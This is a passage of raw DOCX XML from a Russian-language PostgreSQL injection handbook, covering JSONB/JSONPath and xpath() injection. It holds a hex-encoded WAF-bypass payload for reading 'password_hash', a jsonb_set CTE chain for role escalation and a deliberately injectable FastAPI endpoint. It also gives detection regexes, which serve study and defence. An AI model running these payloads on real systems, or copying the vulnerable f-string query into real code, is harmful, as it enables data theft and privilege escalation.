        <w:t xml:space="preserve"> — параметризованный JSONPath; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">безопасно</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Атака отличается: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Path-литерал строится через f-string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или concat: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f"data-&gt;&gt;{path}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — runtime-конструкция, не template.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`'admin'`-like подстроки в path-литерале</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data-&gt;&gt;'password_hash'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от non-admin эндпоинта.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JSONPath с `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рекурсивный спуск) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">?(@.x like_regex ...)` в логах** — нелегитимный pattern для production-кода (там обычно фиксированный path).</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9.3+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — базовые операторы.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12+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSONPath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17+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSON_TABLE, новые конструкции; пересмотреть отдельно как они добавляют поверхность.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Payload C — комбо. JSONB даёт точку входа, cast-error даёт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 (Metadata)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSON-документы часто содержат метаданные приложения (роли, permissions); 3.11.2 — канал их извлечения.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3.11.1 (Boolean coercion)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(data-&gt;&gt;'admin')::boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбинация двух классов 3.11; cast confusion через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;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JSON-документ часто содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"role": "admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-like поля. 3.11.2 + 3.10.1 (CTE UPDATE) — write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в jsonb через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jsonb_set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в data-modifying CTE, эскалация на application-уровне.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3.9.5 (decode hex)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для обхода WAF, блокирующего подстроку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 в JSONPath: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;convert_from(decode('70617373776F72645F68617368', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Комбинация 3.9.5 + 3.11.2 — обход keyword-blacklist в JSON-path context.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регекса для concat в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;&gt;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['"][^'"]*['"]\s*\|\|\s*\$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и для подозрительных JSONPath-паттернов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">like_regex</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3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.11.md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JSON Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все операторы.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jsonpath Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация DSL.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SQL/JSON Path Language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — grammar.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HackerOne — JSON Injection writeups (Postgres)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.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NoSQL injection — applicable concepts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSONPath-аналог в NoSQL.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JSON operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.3 xpath() и XML-tricks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.11.0.</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PostgreSQL поддерживает XML через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-тип (PG 8.3+) и набор функций над ним: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`xpath(xpath_expression text, xml_value xml [, nsarray text[]])`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 выполняет XPath 1.0-выражение над XML-документом.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`xpath_exists(...)`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 boolean-форма xpath().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`xmltable(...)`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setof record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — табличный режим, парсит XML и возвращает rows.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`xmlexists(xpath_expression PASSING xml_value)`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boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же, что xpath_exists.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`xmlparse(DOCUMENT '...')`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`xmlparse(CONTENT '...')`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — парсинг строки в xml.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`query_to_xml(...)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`table_to_xml(...)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`database_to_xml(...)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — сериализация SQL-результатов в XML (см. 3.8.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection-канал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XPath 1.0 как user-controlled DSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PG использует libxml2 как backend; XPath-engine — стандартный libxml2 XPath 1.0 implementation. XPath 1.0 имеет встроенные функции: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string()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string-length()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concat()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contains()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starts-with()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local-name()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namespace-uri()</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count()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position()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — всё нужное для blind-leak отдельных байт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ограничения PG-libxml2 (важные для атакующего):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XXE не работает.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG передаёт libxml2 флаг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XML_PARSE_NONET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — запрещает загрузку external entities по URL. CVE-2017-7484 закрыл лазейки; CVE-2021-43795 (XML_PARSE_HUGE) — DoS, не XXE. Тот класс XML-атак, который даёт OOB-канал в Oracle DB и MSSQL, в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыт</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XPath 2.0/3.0 не поддерживается.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Только XPath 1.0. Это значит, что нет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-конструкций, нет regex, нет datetime-функций. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string()</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 достаточно для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`xpath()` возвращает `xml[]`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массив XML-элементов; для text-результата чаще оборачивают в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">array_to_string(xpath(...)::text[], '')</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A — XPath injection для прямого извлечения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт принимает XPath-выражение для извлечения значения из user-uploaded XML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/documents/{doc_id}/xpath")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def query_doc(doc_id: int, xpath_expr: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 = text(f"SELECT xpath('{xpath_expr}', xml_content) FROM documents WHERE id = :id")</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 {"id": doc_id})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalar()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XML в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">documents.xml_content</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&lt;user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;name&gt;Alice&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;bio&gt;Developer&lt;/bio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
